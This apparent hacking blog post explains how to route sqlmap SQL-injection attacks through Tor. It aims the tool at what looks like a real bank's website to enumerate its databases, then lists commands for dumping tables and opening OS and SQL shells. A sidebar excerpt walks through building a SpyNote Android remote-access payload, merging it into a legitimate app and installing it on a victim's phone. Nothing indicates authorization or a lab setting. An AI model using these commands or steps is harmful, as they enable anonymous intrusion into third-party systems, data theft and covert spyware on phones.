Skip to main content

SQLMAP - Using TOR proxy

Using SQLMAP with TOR

OS: Windows 10
Compiler : Python 3.x
Script : SQLMAP
Proxy: TOR

STEP 1:

Download and install TOR 


STEP 2:

Install TOR and Start TOR services
After installing Tor, a new folder of Tor will be created (Desktop in my case)
Navigate to the following location and start tor.exe

Desktop\Tor Browser\Browser\TorBrowser\Tor


STEP 3: Follow my previous post on SQLMAP to find a target

Navigate to the SQLMAP folder in power shell.
Execute the following commands-

python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs


STEP 4:
Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it:

.\sqlmap.py --tor --tor-type=SOCKS5

SQLMAP OPTIONS

# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs


# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables


# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump


# Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2


# Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1


# Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell


# Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell


# SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"


# Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs

Labels:

Comments

Post a Comment

Popular posts from this blog

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device Windows 10 SpyNote Java  STEP 1: Download and Execute SpyNote (spynote.us is taken down by Department of Homeland Security) DOWNLOAD STEP 2: Provide the Port number and Java path if asked or leave everything as default.   STEP 3: Navigate to Tools menu and select Payload. Fill in the reverse IP and other app details. Here in this step you can configure the properties of the Payload If you plan to merge this payload with any legit application then browse that application here. STEP 4: Now click on build, it will trigger apktool and the apk will be created  . STEP 5:  Now copy the apk file to the android device using any medium like file sharing websites (mega.nz) STEP 6: Install the apk in the android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your co...
31 comments
Read more

NMAP - NSE Scripts (Advanced)

Vulnerability scanning using NSE in Nmap.  Note: I have written this tutorial taking the fact into consideration that the user is well versed with basic NMAP commands. For basic NMAP commands please refer the cheat-sheet given below: Basic Scanning Techniques • Scan a single target :                                                                   nmap [target] • Scan multiple targets:                                                                nmap [target1,target2,etc] • Scan a list of targets                                               ...
4 comments
Read more